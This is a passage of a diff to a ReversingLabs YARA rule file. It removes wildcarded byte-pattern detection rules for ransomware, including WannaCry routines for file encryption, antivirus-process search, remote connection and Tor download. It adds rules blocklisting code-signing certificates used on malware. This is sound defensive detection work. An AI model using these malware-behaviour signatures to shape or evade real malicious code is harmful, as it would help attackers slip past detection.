45 ?? 51 FF 74 85 ?? FF 15 ?? ?? ?? - ?? 85 C0 74 ?? 8B 45 ?? 8D 4E ?? 40 89 45 ?? 83 F8 ?? 72 ?? EB ?? 33 C0 39 45 ?? 8D - 58 ?? 8D 46 ?? 50 FF 37 75 ?? FF 15 ?? ?? ?? ?? EB ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? - ?? FF 37 FF 15 ?? ?? ?? ?? FF 45 ?? 8D 46 ?? 50 FF 15 ?? ?? ?? ?? 8B 4D ?? 6A ?? 8D - 0C 41 8B 45 ?? 81 F9 ?? ?? ?? ?? 89 4D ?? 59 0F 47 C1 89 45 ?? 56 FF 75 ?? FF 15 ?? - ?? ?? ?? 85 C0 74 ?? FF 15 ?? ?? ?? ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? 85 DB 74 ?? 8B 07 - 33 C9 66 39 08 74 ?? 50 FF 15 ?? ?? ?? ?? 8B 0F 33 D2 66 89 54 41 ?? 8B 45 ?? 8B 4D - ?? 89 08 68 ?? ?? ?? ?? 33 C0 50 56 8B 35 ?? ?? ?? ?? FF D6 FF 75 ?? FF 15 ?? ?? ?? - ?? 85 DB 75 ?? 68 ?? ?? ?? ?? 33 C0 50 FF 37 FF D6 8B C3 5F 5E 5B 8B E5 5D C2 - } - $find_files_v5_0_2 = { - 55 8B EC 83 E4 ?? 81 EC ?? ?? ?? ?? 53 56 57 33 FF 89 54 24 ?? 8B F1 89 7C 24 ?? 39 - 7D ?? 75 ?? 8D 54 24 ?? E8 ?? ?? ?? ?? 8B 5C 24 ?? 85 C0 75 ?? 85 DB 75 ?? 33 C0 E9 - ?? ?? ?? ?? 33 DB 43 8B CE E8 ?? ?? ?? ?? 85 C0 75 ?? 66 83 3E ?? 74 ?? 8D 54 24 ?? - 89 7C 24 ?? 8B CE E8 ?? ?? ?? ?? 89 44 24 ?? 39 7C 24 ?? 75 ?? 56 FF 15 ?? ?? ?? ?? - 68 ?? ?? ?? ?? 56 8D 04 46 89 44 24 ?? FF 15 ?? ?? ?? ?? 6A ?? 57 57 8D 44 24 ?? 50 - 6A ?? 56 FF 15 ?? ?? ?? ?? 89 44 24 ?? 83 F8 ?? 75 ?? 8D 44 24 ?? 50 56 FF 15 ?? ?? - ?? ?? 89 44 24 ?? 8B 4C 24 ?? 33 D2 66 89 11 83 F8 ?? 75 ?? BF ?? ?? ?? ?? E9 ?? ?? - ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 68 ?? ?? ?? ?? 8D - 44 24 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8D 44 24 ?? 50 56 FF 15 ?? ?? ?? ?? F6 44 - 24 ?? ?? 74 ?? 85 DB 74 ?? BA ?? ?? ?? ?? 8B CE E8 ?? ?? ?? ?? 85 C0 74 ?? 68 ?? ?? - ?? ?? 56 FF 15 ?? ?? ?? ?? 6A ?? 8B 54 24 ?? 8B CE E8 ?? ?? ?? ?? EB ?? 68 ?? ?? ?? - ?? 56 FF 15 ?? ?? ?? ?? 57 EB ?? FF 74 24 ?? 8D 54 24 ?? 8B CE E8 ?? ?? ?? ?? 59 8B - 44 24 ?? 33 C9 66 89 08 8D 44 24 ?? 50 FF 74 24 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? - ?? ?? ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? 8B C7 5F 5E 5B - 8B E5 5D C3 - } - $crypt_files_v5_0_2 = { - 55 8B EC 81 EC ?? ?? ?? ?? 53 56 57 8B D9 89 55 ?? 33 FF 89 5D ?? 21 7D ?? B9 ?? ?? - ?? ?? 89 7D ?? E8 ?? ?? ?? ?? 8B F0 33 C0 89 75 ?? 85 F6 0F 84 ?? ?? ?? ?? 50 68 ?? - ?? ?? ?? 6A ?? 50 50 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 8B D8 83 FB ?? 75 ?? 33 C0 - 50 68 ?? ?? ?? ?? 6A ?? 50 50 68 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? 8B D8 83 FB - ?? 0F 84 ?? ?? ?? ?? 8B 7D ?? FF 77 ?? FF 77 ?? 6A ?? 6A ?? 53 FF 15 ?? ?? ?? ?? 6A - ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 6A ?? 8D 45 ?? 50 68 - ?? ?? ?? ?? 56 53 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 81 BE ?? ?? ?? ?? ?? ?? ?? ?? 75 ?? - 81 BE ?? ?? ?? ?? ?? ?? ?? ?? 75 ?? FF 77 ?? FF 77 ?? 6A ?? 6A ?? 53 FF 15 ?? ?? ?? - ?? 53 FF 15 ?? ?? ?? ?? 8B CE E8 ?? ?? ?? ?? 33 C0 E9 ?? ?? ?? ?? 6A ?? 6A ?? 0F 57 - C0 66 0F 13 45 ?? FF 75 ?? FF 75 ?? 53 FF 15 ?? ?? ?? ?? FF 75 ?? 83 65 ?? ?? 8D 55 - ?? 56 8D 4D ?? E8 ?? ?? ?? ?? 59 59 85 C0 74 ?? 6A ?? 58 C6 45 ?? ?? 48 75 ?? 51 68 - ?? ?? ?? ?? 8D 55 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 83 C4 ?? 8B 8E ?? ?? - ?? ?? 83 65 ?? ?? 83 65 ?? ?? 41 89 45 ?? 8B 45 ?? 89 45 ?? E8 ?? ?? ?? ?? 8B 8E ?? - ?? ?? ?? 83 C1 ?? 89 45 ?? E8 ?? ?? ?? ?? 89 45 ?? 33 FF 6A ?? 8D 45 ?? 50 FF B6 ?? - ?? ?? ?? FF 75 ?? 53 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 45 ?? 85 C0 0F 84 - ?? ?? ?? ?? 3B 86 ?? ?? ?? ?? 8B 55 ?? 6A ?? 59 0F 42 F9 83 7D ?? ?? 8D 8D ?? ?? ?? - ?? 0F 45 7D ?? 01 86 ?? ?? ?? ?? 89 7D ?? 83 96 ?? ?? ?? ?? ?? 8B 45 ?? 50 FF 75 ?? - 89 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? 59 59 33 C9 F7 D8 41 99 51 6A ?? 52 50 53 FF 15 ?? - ?? ?? ?? 6A ?? 8D 45 ?? 50 FF 75 ?? FF 75 ?? 53 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 8B 75 - ?? 8B 7D ?? 6A ?? FF 15 ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 57 56 53 FF 15 ?? ?? ?? ?? 85 - C0 74 ?? 8B 75 ?? 8B 7D ?? 33 C0 40 01 86 ?? ?? ?? ?? 83 96 ?? ?? ?? ?? ?? EB ?? 33 - C0 8D 78 ?? 85 FF 0F 84 ?? ?? ?? ?? 83 7D ?? ?? 74 ?? 6A ?? 6A ?? 0F 57 C0 66 0F 13 - 45 ?? FF 75 ?? FF 75 ?? 53 FF 15 ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 68 ?? ?? ?? ?? 56 53 - FF 15 ?? ?? ?? ?? 8B 4D ?? 8B F8 89 7D ?? E8 ?? ?? ?? ?? 8B 4D ?? E8 ?? ?? ?? ?? 8B - CE E8 ?? ?? ?? ?? 85 DB 0F 84 ?? ?? ?? ?? 85 FF 0F 84 ?? ?? ?? ?? 83 7D ?? ?? 74 ?? - FF 75 ?? 83 65 ?? ?? 83 65 ?? ?? 8B 35 ?? ?? ?? ?? FF D6 8D 0C 45 ?? ?? ?? ?? E8 ?? - ?? ?? ?? FF 75 ?? 8B F8 33 C0 40 83 67 ?? ?? 88 07 FF D6 FF 75 ?? 03 C0 89 47 ?? FF - D6 8D 04 45 ?? ?? ?? ?? 50 FF 75 ?? 8D 47 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? FF 75 - ?? FF D6 8D 04 45 ?? ?? ?? ?? 50 57 8D 45 ?? 50 53 FF 15 ?? ?? ?? ?? 8B 4D ?? 89 01 - 8B CF E8 ?? ?? ?? ?? 8B 7D ?? 8B 45 ?? FF 70 ?? FF 70 ?? 6A ?? 6A ?? 53 FF 15 ?? ?? - ?? ?? 53 FF 15 ?? ?? ?? ?? 8B C7 5F 5E 5B 8B E5 5D C3 - } - $remote_connection_v5_0_2 = { - 55 8B EC 83 EC ?? 53 8B 1D ?? ?? ?? ?? 56 8B F1 57 83 7E ?? ?? 74 ?? FF 76 ?? FF D3 - 8B CE E8 ?? ?? ?? ?? 33 FF 57 57 6A ?? 57 57 FF 75 ?? FF 75 ?? FF 76 ?? FF 15 ?? ?? - ?? ?? 89 45 ?? 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 68 ?? - ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? FF 75 ?? 8B F0 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? - 83 C4 ?? B8 ?? ?? ?? ?? 81 7D ?? ?? ?? ?? ?? B9 ?? ?? ?? ?? 0F 44 C8 57 51 57 57 68 - ?? ?? ?? ?? 56 8B 75 ?? 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 89 45 ?? 85 C0 74 ?? FF - 75 ?? FF 75 ?? FF 75 ?? FF 75 ?? 50 FF 15 ?? ?? ?? ?? 33 C9 41 85 C0 8B 45 ?? 0F 45 - F9 50 FF D3 56 FF D3 8D 4D ?? E8 ?? ?? ?? ?? 8B C7 5F 5E 5B 8B E5 5D C2 - } - $crypt_files_v5_0_3 = { - 55 8B EC 81 EC ?? ?? ?? ?? 53 56 57 8B F9 89 55 ?? 33 DB B9 ?? ?? ?? ?? 89 5D ?? E8 - ?? ?? ?? ?? 8B F0 89 75 ?? 85 F6 75 ?? 33 C0 E9 ?? ?? ?? ?? 53 68 ?? ?? ?? ?? 6A ?? - 53 53 68 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 8B F8 83 FF ?? 0F 84 ?? ?? ?? ?? 6A ?? 53 - 6A ?? 68 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 53 8D 45 ?? 50 68 ?? ?? ?? ?? - 56 57 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 81 BE ?? ?? ?? ?? ?? ?? ?? ?? 75 ?? 81 BE ?? ?? - ?? ?? ?? ?? ?? ?? 75 ?? 8B 45 ?? FF 70 ?? FF 70 ?? 53 53 57 FF 15 ?? ?? ?? ?? 57 FF - 15 ?? ?? ?? ?? 8B CE E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 53 53 0F 57 C0 66 0F 13 45 ?? FF - 75 ?? FF 75 ?? 57 FF 15 ?? ?? ?? ?? FF 75 ?? 8D 55 ?? 89 5D ?? 56 8D 4D ?? E8 ?? ?? - ?? ?? 59 59 85 C0 74 ?? 6A ?? 58 88 5D ?? 48 75 ?? 51 68 ?? ?? ?? ?? 8D 55 ?? 8D 8D - ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 83 C4 ?? 8B 8E ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 41 - 8B 45 ?? 89 85 ?? ?? ?? ?? 89 5D ?? 89 5D ?? E8 ?? ?? ?? ?? 8B 8E ?? ?? ?? ?? 83 C1 - ?? 89 45 ?? E8 ?? ?? ?? ?? 89 45 ?? 89 5D ?? 53 8D 45 ?? 50 FF B6 ?? ?? ?? ?? FF 75 - ?? 57 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 4D ?? 85 C9 0F 84 ?? ?? ?? ?? 3B - 8E ?? ?? ?? ?? 8B 45 ?? 6A ?? 5A 0F 42 C2 39 5D ?? 8B 55 ?? 0F 45 45 ?? 01 8E ?? ?? - ?? ?? 8D 8D ?? ?? ?? ?? 89 45 ?? 11 9E ?? ?? ?? ?? 8B 45 ?? 8B 75 ?? 50 56 89 45 ?? - E8 ?? ?? ?? ?? 8B 45 ?? 59 59 33 C9 F7 D8 41 99 51 53 52 50 57 FF 15 ?? ?? ?? ?? 8B - C3 89 5D ?? 83 F8 ?? 7D ?? 53 8D 45 ?? 50 FF 75 ?? 56 57 FF 15 ?? ?? ?? ?? 85 C0 75 - ?? 6A ?? FF 15 ?? ?? ?? ?? 8B 45 ?? 40 89 45 ?? EB ?? 8B 75 ?? 33 C0 8B 4D ?? 40 01 - 86 ?? ?? ?? ?? 11 9E ?? ?? ?? ?? EB ?? 33 C0 8D 48 ?? 89 4D ?? 85 C9 0F 84 ?? ?? ?? - ?? 39 5D ?? 74 ?? 6A ?? 53 0F 57 C0 66 0F 13 45 ?? FF 75 ?? FF 75 ?? 57 FF 15 ?? ?? - ?? ?? 53 8D 45 ?? 50 68 ?? ?? ?? ?? 56 57 FF 15 ?? ?? ?? ?? 8B 4D ?? 8B D8 E8 ?? ?? - ?? ?? 8B 4D ?? E8 ?? ?? ?? ?? 8B CE E8 ?? ?? ?? ?? 83 FF ?? 74 ?? 8B 45 ?? 57 83 08 - ?? FF 15 ?? ?? ?? ?? 8B C3 5F 5E 5B 8B E5 5D C3 - } - $remote_connection_v5_0_3 = { - 55 8B EC 81 EC ?? ?? ?? ?? 53 56 57 68 ?? ?? ?? ?? 33 DB 8D 85 ?? ?? ?? ?? 8B F1 53 - 50 89 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B FB 0F B7 04 5E 66 85 C0 74 ?? 83 F8 ?? 75 ?? - 83 C3 ?? 56 89 5D ?? FF 15 ?? ?? ?? ?? 3B D8 73 ?? 8D 14 1B 0F B7 04 32 EB ?? 66 83 - F8 ?? 74 ?? 43 0F B7 04 5E 66 85 C0 75 ?? EB ?? 8B CB 2B 4D ?? 74 ?? 03 F2 8D BD ?? - ?? ?? ?? D1 E9 F3 A5 13 C9 66 F3 A5 8B 75 ?? 8D 43 ?? 8D 04 46 50 8D 85 ?? ?? ?? ?? - 50 FF 15 ?? ?? ?? ?? 33 FF 47 43 85 FF 74 ?? 8D 4D ?? E8 ?? ?? ?? ?? 8B 15 ?? ?? ?? - ?? 8D 7D ?? 6A ?? 59 BE ?? ?? ?? ?? F3 A5 8B 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F8 85 - FF 74 ?? 51 8D 45 ?? 50 FF 15 ?? ?? ?? ?? 50 8D 45 ?? 50 83 EC ?? 57 FF 15 ?? ?? ?? - ?? 50 57 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 8D 4D ?? E8 ?? ?? ?? ?? 8B CF 8B - F0 E8 ?? ?? ?? ?? EB ?? 33 F6 83 7D ?? ?? 74 ?? FF 75 ?? FF 15 ?? ?? ?? ?? 5F 8B C6 - 5E 5B 8B E5 5D C3 - } + condition: + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Yijiajian (Amoy) Jiankan Tech Co.,LTD." and pe.signatures[i].serial=="65:4b:40:6d:e3:88:ec:2a:ec:25:3f:f2:ba:4c:4b:bd" and 1398902400<=pe.signatures[i].not_after) +} +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_78D1817Ebcf338B4E9C810F9740A726B : INFO FILE +{ + meta: + description = "Certificate used for digitally signing malware." + author = "ReversingLabs" + id = "3d0a97a4-c45a-5238-a287-867529b470cb" + date = "2023-11-08" + modified = "2023-11-08" + reference = "ReversingLabs" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L13674-L13690" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "62e59130ef0ac35b17a265bb8bc2031cac6a75c11925ccb21eb4601b8fbe1a63" + score = 75 + quality = 90 + tags = "INFO, FILE" + status = "RELEASED" + sharing = "TLP:WHITE" + category = "INFO" + importance = 25 condition: - uint16(0)==0x5A4D and (($search_antivirus_processes and $find_files and $crypt_files and $remote_connection) or ($find_files_v2 and $crypt_files_v2 and $search_antivirus_processes_v2 and $remote_connection_v2) or ($search_antivirus_processes_v2 and $find_files_v2_1 and $crypt_files_v2_1 and $remote_connection_v2_1) or ($search_antivirus_processes_v4_1_2 and $find_files_v4_1_2 and $crypt_files_v4_1_2 and $remote_connection_v4_1_2 and $url_parameters_setup_v4_1_2) or ($search_antivirus_processes_v4 and $find_files_v4 and $crypt_files_v4 and $url_parameters_setup_v4) or ($search_antivirus_processes_v2 and $find_files_v2_1 and $remote_connection_v2_1 and $crypt_files_v3) or ($search_antivirus_processes_v5 and $find_files_v5 and $crypt_files_v5 and $remote_connection_v5 and $url_parameters_setup_v5) or ($search_antivirus_processes_v5_0_1 and $find_files_v5_0_1 and $crypt_files_v5_0_1 and $url_parameters_setup_v5_0_1 and $remote_connection_v5_0_1) or ($search_antivirus_processes_v5_0_2 and $find_files_v5_0_2 and $crypt_files_v5_0_2 and $set_url_parameters_v5_0_2 and $remote_connection_v5_0_2) or ($search_antivirus_processes_v5_0_2 and $find_files_v5_0_2 and $crypt_files_v5_0_3 and $set_url_parameters_v5_0_3 and $remote_connection_v5_0_3)) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "CONSTRUTORA NOVO PARQUE LTDA - ME" and pe.signatures[i].serial=="78:d1:81:7e:bc:f3:38:b4:e9:c8:10:f9:74:0a:72:6b" and 1431734400<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Win32_Ransomware_Wannacry : TC_DETECTION MALICIOUS MALWARE FILE +rule REVERSINGLABS_Cert_Blocklist_45Fbcdb1Fbd3D702Fb77257B45D8C58E : INFO FILE { meta: - description = "Yara rule that detects WannaCry ransomware." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "61734d47-2525-5e3a-94b4-60493dfe2b93" - date = "2020-07-15" - modified = "2020-07-15" + id = "6bfd7c1d-2608-5ca0-8e1e-04c73588895a" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Win32.Ransomware.WannaCry.yara#L3-L135" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "fed58b533a9f7c3eb1b3e4f8fbe1f519aab94d1c066ae6937c21876693be0eac" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L13692-L13708" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "441e10f49515d75ee9e8983ba4321377fee13a91ca5eeddc08b393136ce8ccfd" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "WannaCry" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $main_1 = { - A0 ?? ?? ?? ?? 56 57 6A ?? 88 85 ?? ?? ?? ?? 59 33 C0 8D BD ?? ?? ?? ?? F3 AB 66 AB - AA 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 53 FF 15 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 8D 85 - ?? ?? ?? ?? 6A ?? 50 FF D6 59 85 C0 59 74 ?? 8D 85 ?? ?? ?? ?? 6A ?? 50 FF D6 59 88 - 18 59 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 59 59 - 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 53 53 53 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 5F 5E 85 - C0 74 ?? 8D 45 ?? 8D 8D ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 89 5D - } - $main_2 = { - 68 ?? ?? ?? ?? 33 DB 50 53 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 FF 15 - ?? ?? ?? ?? 83 38 ?? 75 ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 00 FF 70 ?? E8 ?? ?? - ?? ?? 59 85 C0 59 75 ?? 53 E8 ?? ?? ?? ?? 85 C0 59 74 ?? BE ?? ?? ?? ?? 53 8D 85 ?? - ?? ?? ?? 56 50 FF 15 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 83 F8 ?? 74 ?? E8 ?? ?? ?? ?? - 85 C0 0F 85 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A ?? 50 FF D6 59 85 C0 - 59 74 ?? 8D 85 ?? ?? ?? ?? 6A ?? 50 FF D6 59 88 18 59 8D 85 ?? ?? ?? ?? 50 FF 15 ?? - ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? - 53 53 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 53 53 68 ?? ?? ?? ?? E8 - } - $main_3 = { - 83 EC ?? 56 57 B9 ?? ?? ?? ?? BE ?? ?? ?? ?? 8D 7C 24 ?? 33 C0 F3 A5 A4 89 44 24 ?? - 89 44 24 ?? 89 44 24 ?? 89 44 24 ?? 89 44 24 ?? 66 89 44 24 ?? 50 50 50 6A ?? 50 88 - 44 24 ?? FF 15 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 8D 4C 24 ?? 8B F0 6A ?? 51 56 - FF 15 ?? ?? ?? ?? 8B F8 56 8B 35 ?? ?? ?? ?? 85 FF 75 ?? FF D6 6A ?? FF D6 E8 - } - $start_service_3 = { - 83 EC ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? FF 15 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 83 - 38 ?? 7D ?? E8 ?? ?? ?? ?? 83 C4 ?? C3 57 68 ?? ?? ?? ?? 6A ?? 6A ?? FF 15 ?? ?? ?? - ?? 8B F8 85 FF 74 ?? 53 56 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 8B 1D - ?? ?? ?? ?? 8B F0 85 F6 74 ?? 6A ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 56 FF D3 57 FF D3 5E - 5B 8D 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 50 C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? - ?? ?? C7 44 24 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 5F 83 C4 ?? C3 - } - $main_4 = { - 83 EC ?? 57 68 ?? ?? ?? ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 8B F8 85 FF 74 ?? 53 56 68 - ?? ?? ?? ?? 68 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 8B F0 85 F6 74 ?? - 6A ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 56 FF D3 57 FF D3 5E 5B 8D 44 24 ?? C7 44 24 ?? ?? - ?? ?? ?? 50 C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? - FF 15 ?? ?? ?? ?? 33 C0 5F 83 C4 ?? C2 - } - $main_5 = { - 68 ?? ?? ?? ?? 50 53 FF 15 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A ?? 50 - FF D6 59 85 C0 59 74 ?? 8D 85 ?? ?? ?? ?? 6A ?? 50 FF D6 59 88 18 59 8D 85 ?? ?? ?? - ?? 50 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 59 59 8D 8D ?? ?? ?? ?? E8 - ?? ?? ?? ?? 53 53 53 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 5F 5E 85 C0 74 ?? 8D 45 ?? 8D - 8D ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 89 5D ?? E8 ?? ?? ?? ?? 3B C3 74 ?? FF 75 ?? 50 E8 - ?? ?? ?? ?? 59 3B C3 59 74 ?? 68 ?? ?? ?? ?? 50 E8 - } - $main_6 = { - FF 74 24 ?? FF 74 24 ?? FF 74 24 ?? FF 74 24 ?? E8 ?? ?? ?? ?? C2 - } - $set_reg_key_6 = { - 68 ?? ?? ?? ?? F3 AB 66 AB AA 8D 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 50 FF 15 ?? ?? ?? - ?? 8B 2D ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 83 C4 ?? 33 FF 89 7C 24 ?? 85 FF 75 ?? 8D 4C - 24 ?? 8D 54 24 ?? 51 52 68 ?? ?? ?? ?? EB ?? 8D 44 24 ?? 8D 4C 24 ?? 50 51 68 ?? ?? - ?? ?? FF 15 ?? ?? ?? ?? 8B 44 24 ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 8C 24 ?? ?? ?? ?? 85 - C9 74 ?? 8D 94 24 ?? ?? ?? ?? 52 68 ?? ?? ?? ?? FF D5 8D BC 24 ?? ?? ?? ?? 83 C9 ?? - 33 C0 F2 AE F7 D1 8D 84 24 ?? ?? ?? ?? 51 8B 4C 24 ?? 50 6A ?? 6A ?? 68 ?? ?? ?? ?? - 51 FF D3 8B 7C 24 ?? 8B F0 F7 DE 1B F6 46 EB ?? 8D 54 24 ?? 8D 8C 24 ?? ?? ?? ?? 52 - 51 6A ?? 6A ?? 68 ?? ?? ?? ?? 50 C7 44 24 ?? ?? ?? ?? ?? FF 15 - } - $download_tor_6 = { - 81 EC ?? ?? ?? ?? 53 55 56 57 E8 ?? ?? ?? ?? 84 C0 0F 85 ?? ?? ?? ?? A0 ?? ?? ?? ?? - B9 ?? ?? ?? ?? 88 44 24 ?? 33 C0 8D 7C 24 ?? 8B 35 ?? ?? ?? ?? F3 AB 68 ?? ?? ?? ?? - 68 ?? ?? ?? ?? 66 AB 68 ?? ?? ?? ?? 8D 4C 24 ?? 33 ED 68 ?? ?? ?? ?? 51 89 2D ?? ?? - ?? ?? 89 2D ?? ?? ?? ?? AA FF D6 8B 1D ?? ?? ?? ?? 83 C4 ?? 8D 54 24 ?? 52 FF D3 83 - F8 ?? 0F 85 ?? ?? ?? ?? 55 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 84 - C0 75 ?? 5F 5E 5D 5B 81 C4 ?? ?? ?? ?? C3 A0 ?? ?? ?? ?? B9 ?? ?? ?? ?? 88 84 24 ?? - ?? ?? ?? 33 C0 8D BC 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? F3 AB 66 AB 68 ?? ?? ?? ?? 68 ?? - ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 AA FF D6 83 C4 ?? 8D 94 24 ?? ?? ?? - ?? 52 FF D3 83 F8 ?? 75 ?? 5F 5E 5D 32 C0 5B 81 C4 ?? ?? ?? ?? C3 - } - $main_7 = { - 68 ?? ?? ?? ?? 50 53 FF 15 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A ?? 50 - FF D6 59 85 C0 59 74 ?? 8D 85 ?? ?? ?? ?? 6A ?? 50 FF D6 59 88 18 59 8D 85 ?? ?? ?? - ?? 50 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 59 59 8D 8D ?? ?? ?? ?? E8 - ?? ?? ?? ?? 53 53 53 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 5F 5E 85 C0 74 ?? 8D 45 ?? 8D - 8D ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 53 8F 45 ?? E8 ?? ?? ?? ?? 39 44 24 ?? 74 ?? 89 44 - 24 ?? 83 EC ?? 2B C3 58 74 ?? FF 75 ?? 50 E8 ?? ?? ?? ?? 59 89 44 24 ?? 83 EC ?? 2B - C3 58 59 74 ?? 68 ?? ?? ?? ?? 50 E8 - } - $main_8 = { - 68 ?? ?? ?? ?? F3 AB 66 AB AA 8D 44 24 ?? 50 6A ?? FF 15 ?? ?? ?? ?? 8B 35 ?? ?? ?? - ?? 8D 4C 24 ?? 6A ?? 51 FF D6 83 C4 ?? 85 C0 74 ?? 8D 54 24 ?? 6A ?? 52 FF D6 83 C4 - ?? C6 00 ?? 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 8C 24 - ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 5F - 5E 85 C0 74 ?? 8D 4C 24 ?? C7 44 24 ?? ?? ?? ?? ?? 51 68 ?? ?? ?? ?? 8D 8C 24 ?? ?? - ?? ?? E8 ?? ?? ?? ?? 85 C0 74 ?? 8B 54 24 ?? 52 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 - ?? 68 ?? ?? ?? ?? 50 E8 - } - $entrypoint_all = { - 55 8B EC 